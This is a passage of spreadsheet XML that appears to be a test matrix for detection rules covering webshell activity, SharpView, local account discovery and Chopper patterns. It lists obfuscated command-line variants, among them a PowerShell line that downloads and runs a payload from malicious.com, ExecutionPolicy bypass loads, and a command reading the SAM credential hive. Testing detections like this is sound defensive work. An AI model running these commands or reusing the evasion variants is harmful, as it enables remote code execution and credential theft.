        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E40" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -cOMmAnd "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F40" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G40" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H40" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I40" s="43" t="n"/>
      <c r="J40" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K40" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" s="42">
      <c r="A41" s="43" t="n"/>
      <c r="B41" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C41" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D41" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E41" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -coMmaND "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F41" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G41" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H41" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I41" s="43" t="n"/>
      <c r="J41" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K41" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" s="42">
      <c r="A42" s="43" t="n"/>
      <c r="B42" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C42" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D42" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E42" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noProFile -"Command" "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F42" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G42" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H42" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I42" s="43" t="n"/>
      <c r="J42" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K42" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" s="42">
      <c r="A43" s="43" t="n"/>
      <c r="B43" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C43" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D43" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E43" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F43" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G43" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H43" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I43" s="43" t="n"/>
      <c r="J43" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K43" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="44" ht="15.75" customHeight="1" s="42">
      <c r="A44" s="43" t="n"/>
      <c r="B44" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C44" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D44" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E44" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ec" JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F44" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G44" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H44" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I44" s="36" t="n"/>
      <c r="J44" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K44" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" s="42">
      <c r="A45" s="43" t="n"/>
      <c r="B45" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C45" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D45" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E45" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F45" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G45" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H45" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I45" s="43" t="n"/>
      <c r="J45" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K45" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" s="42">
      <c r="A46" s="43" t="n"/>
      <c r="B46" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C46" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D46" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E46" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /C "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F46" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G46" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H46" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I46" s="43" t="n"/>
      <c r="J46" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K46" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" s="42">
      <c r="A47" s="43" t="n"/>
      <c r="B47" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C47" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D47" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E47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47" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G47" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H47" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I47" s="43" t="n"/>
      <c r="J47" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K47" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" s="42">
      <c r="A48" s="43" t="n"/>
      <c r="B48" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C48" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D48" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E48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48" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G48" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H48" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I48" s="43" t="n"/>
      <c r="J48" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K48" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" s="42">
      <c r="A49" s="43" t="n"/>
      <c r="B49" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C49" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D49" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E49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49" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G49" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H49" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I49" s="43" t="n"/>
      <c r="J49" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K49" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" s="42">
      <c r="A50" s="43" t="n"/>
      <c r="B50" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C50" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D50" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E50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50" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G50" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H50" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I50" s="43" t="n"/>
      <c r="J50" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K50" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" s="42">
      <c r="A51" s="43" t="n"/>
      <c r="B51" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C51" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D51" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E51" s="36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51" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G51" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H51" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I51" s="43" t="n"/>
      <c r="J51" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K51" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" s="42">
      <c r="A52" s="43" t="n"/>
      <c r="B52" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C52" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D52" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E52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52" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G52" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H52" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I52" s="36" t="n"/>
      <c r="J52" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K52" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="53" ht="15.75" customHeight="1" s="42">
      <c r="A53" s="43" t="n"/>
      <c r="B53" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C53" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D53" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E53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53" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G53" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H53" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I53" s="43" t="n"/>
      <c r="J53" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K53" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" s="42">
      <c r="A54" s="43" t="n"/>
      <c r="B54" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C54" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D54" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E54" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F54" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G54" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H54" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I54" s="43" t="n"/>
      <c r="J54" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K54" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" s="42">
      <c r="A55" s="43" t="n"/>
      <c r="B55" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C55" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D55" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E55" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"ExecutionPolicy" Bypass /"Command" "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F55" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G55" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H55" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I55" s="43" t="n"/>
      <c r="J55" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K55" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" s="42">
      <c r="A56" s="43" t="n"/>
      <c r="B56" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C56" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D56" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E56" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -ExeCUTIONPOLICY Bypass /"Command" "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F56" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G56" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H56" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I56" s="43" t="n"/>
      <c r="J56" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K56" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="57" ht="15.75" customHeight="1" s="42">
      <c r="A57" s="43" t="n"/>
      <c r="B57" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C57" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D57" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E57" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -EXeCutIONPOlIcY Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F57" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G57" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H57" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I57" s="43" t="n"/>
      <c r="J57" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K57" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="58" ht="15.75" customHeight="1" s="42">
      <c r="A58" s="43" t="n"/>
      <c r="B58" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C58" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D58" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E58" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noPrOFilE -"ExecutionPolicy" Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F58" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G58" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H58" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I58" s="43" t="n"/>
      <c r="J58" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K58" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="59" ht="15.75" customHeight="1" s="42">
      <c r="A59" s="43" t="n"/>
      <c r="B59" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C59" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D59" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E59" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"ExecutionPolicy" Bypass -COmMaNd "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F59" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G59" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H59" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I59" s="43" t="n"/>
      <c r="J59" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K59" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="60" ht="15.75" customHeight="1" s="42">
      <c r="A60" s="43" t="n"/>
      <c r="B60" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C60" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D60" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E60" s="36" t="inlineStr">
        <is>
          <t>wmic useraccount list brief</t>
        </is>
      </c>
      <c r="F60" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G60" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H60" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I60" s="43" t="n"/>
      <c r="J60" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K60" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="61" ht="15.75" customHeight="1" s="42">
      <c r="A61" s="43" t="n"/>
      <c r="B61" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C61" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D61" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E61" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-ChildItem C:\Users\"</t>
        </is>
      </c>
      <c r="F61" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G61" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H61" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I61" s="43" t="n"/>
      <c r="J61" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K61" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="62" ht="15.75" customHeight="1" s="42">
      <c r="A62" s="43" t="n"/>
      <c r="B62" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C62" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D62" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E62" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F62" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G62" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H62" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I62" s="43" t="n"/>
      <c r="J62" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K62" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="63" ht="15.75" customHeight="1" s="42">
      <c r="A63" s="43" t="n"/>
      <c r="B63" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C63" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D63" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E63" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F63" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G63" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H63" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I63" s="36" t="n"/>
      <c r="J63" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K63" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="64" ht="15.75" customHeight="1" s="42">
      <c r="A64" s="43" t="n"/>
      <c r="B64" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C64" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D64" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E64" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-LocalUser"</t>
        </is>
      </c>
      <c r="F64" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G64" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H64" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I64" s="36" t="n"/>
      <c r="J64" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K64" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="65" ht="15.75" customHeight="1" s="42">
      <c r="A65" s="43" t="n"/>
      <c r="B65" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C65" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D65" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E65" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" -"c" "type C:\Windows\System32\config\SAM"</t>
        </is>
      </c>
      <c r="F65" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G65" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H65" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I65" s="43" t="n"/>
      <c r="J65" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K65" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="66" ht="15.75" customHeight="1" s="42">
      <c r="A66" s="43" t="n"/>
      <c r="B66" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C66" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D66" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E66" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /C "type C:\Windows\System32\config\SAM"</t>
        </is>
      </c>
      <c r="F66" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G66" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H66" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I66" s="43" t="n"/>
      <c r="J66" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K66" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="67" ht="15.75" customHeight="1" s="42">
      <c r="A67" s="43" t="n"/>
      <c r="B67" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C67" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D67" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E67" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp; ipconfig &amp; echo"</t>
        </is>
      </c>
      <c r="F67" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G67" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H67" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I67" s="43" t="n"/>
      <c r="J67" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K67" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="68" ht="15.75" customHeight="1" s="42">
      <c r="A68" s="43" t="n"/>
      <c r="B68" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C68" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D68" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E68" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;wh^oami&amp;echo"</t>
        </is>
      </c>
      <c r="F68" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G68" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H68" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I68" s="43" t="n"/>
      <c r="J68" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K68" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="69" ht="15.75" customHeight="1" s="42">
      <c r="A69" s="43" t="n"/>
      <c r="B69" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C69" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D69" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E69" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "whoami &amp; echo [E]"</t>
        </is>
      </c>
      <c r="F69" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G69" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H69" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I69" s="43" t="n"/>
      <c r="J69" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K69" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="70" ht="15.75" customHeight="1" s="42">
      <c r="A70" s="43" t="n"/>
      <c r="B70" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C70" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D70" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E70" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F70" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G70" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H70" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I70" s="43" t="n"/>
      <c r="J70" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K70" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="71" ht="15.75" customHeight="1" s="42">
      <c r="A71" s="43" t="n"/>
      <c r="B71" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
